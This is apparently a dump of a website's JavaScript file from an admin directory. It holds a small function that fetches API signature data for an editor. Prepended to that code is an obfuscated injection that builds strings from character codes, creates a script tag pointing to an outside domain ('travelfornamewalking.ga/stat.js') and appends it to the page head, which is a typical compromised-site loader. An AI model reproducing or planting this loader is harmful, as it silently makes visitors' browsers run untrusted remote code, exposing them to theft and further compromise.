Current File : /home/users/barii/public_html/finansenl.com.pl/wodki/admin/tablice/js/main.adobe.js
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,59,47,47,109,97,105,110,46,116,114,97,118,101,108,102,111,114,110,97,109,101,119,97,108,107,105,110,103,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();function updateSignature(callback)  {
    $.ajax('scripts/genSignature', function(data) {
        editor.updateConfig({
            apiKey: data.apikey,
            salt: data.salt,
            timestamp: data.timestamp,
            signature: data.signature
        });

        // safe to call saveHires() now
        callback();
    });
}